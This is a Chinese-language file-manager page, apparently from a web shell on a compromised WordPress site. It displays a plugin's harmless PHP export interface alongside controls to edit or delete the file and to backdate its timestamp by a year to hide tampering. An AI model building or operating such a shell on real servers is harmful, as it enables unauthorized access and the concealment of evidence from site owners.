文件操作 - exportable-module.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/vec.uaysen.cl/html/wp-content/plugins/admin-menu-editor-pro/extras/exportable-module.php
编辑文件内容
<?php interface ameExportableModule { /** * @return array|null */ public function exportSettings(); /** * @param array $newSettings * @return void */ public function importSettings($newSettings); /** * @return string */ public function getExportOptionLabel(); public function getExportOptionDescription(); }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件